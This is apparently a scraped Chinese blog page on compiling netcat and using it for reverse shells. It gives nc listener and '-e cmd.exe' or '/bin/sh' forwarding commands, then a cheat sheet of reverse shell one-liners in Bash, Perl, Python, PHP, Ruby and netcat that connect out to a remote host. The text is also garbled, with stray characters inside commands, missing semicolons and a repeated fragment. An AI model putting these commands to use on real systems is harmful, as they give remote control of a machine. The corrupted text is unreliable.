然后当然是解压了
tar zxvf netcat-0.7.1.tar.gz
解压完毕之后会生成目录,要cd进去
cd netcat-0.7.1
然后进行编译前的配置。
./configure
配置完了之后就可以make编译了。
编译成功就生成了netcat可执行的文件了,位于src目录,cd进去进行运行./netcat -h.如图
本地Windows监听
nc -vv -l -p 1234
远程Windows转发
nc -t -e C:\WINDOWS\system32\cmd.exe 8.8.8.8 1234
远程Linux转发
./netcat 8.8.8.8 1234 -e /bin/sh
ReverseShell.c
ReverseShell.pl
ReverseShell.py
phpspy.php
———————NetCat for linux 参数e————————-
下载netcat-0.7.1.tar.gz
tar zxvf netcat-0.7.1.tar.gz
cd netcat-0.7.1
./configure
make
cd src
./netcat -h
——————————————————————–
一句话反d命令
[Bash]
bash -i >&/段虚dev/tcp/10.0.0.1/8080 0>&1
[PERL]
perl -e ‘use Socket$i=”10.0.0.1″$p=1234socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”))if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”)open(STDOUT,”>&S”)open(STDERR,”>&S”)exec(“/bin/sh -i”)}’
[Python]
python -c ‘import socket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((“10.0.0.1″,1234))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","-i"])’
[PHP]
php -r ‘$sock=fsockopen(“10.0.0.1″,1234)exec(“/bin/sh -i <&3 >&3 2>&3″)’
[Ruby]
ruby -rsocket -e’f=TCPSocket.open(“10.0.0.1″,1234).to_iexec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’瞎败
[Netcat]
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/fmkfifo /tmp/fcat /tmp/f|/bin/sh -i 2>磨燃颤&1|nc 10.0.0.1 1234 >/tmp/f
etcat-0.7.1.tar.gz 然后当然是解压了基如 tar zxvf netcat-0.7.1.tar.gz 解压完毕之后会昌手生成目录,要cd进去 cd netcat-0.7.1 然后进行编译前的配置。 ./configure 配置完了之后就可耐锋嫌以make编译了。 编译成功就生成了netcat可执行的文件了,位于src目...欢迎分享,转载请注明来源:内存溢出
评论列表(0条)